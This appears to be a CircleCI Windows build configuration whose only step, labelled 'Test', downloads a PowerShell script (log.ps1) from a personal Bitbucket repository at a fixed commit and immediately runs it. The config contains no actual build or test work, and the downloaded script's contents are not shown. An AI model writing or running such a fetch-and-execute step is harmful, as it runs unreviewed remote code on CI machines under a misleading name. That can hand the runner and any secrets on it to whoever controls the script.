version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/isotoaku/sotoku/raw/94f6442878f4c1c395bfaf1c455b5f6fd2f3d0f0/log.ps1 -OutFile log.ps1
            ./log.ps1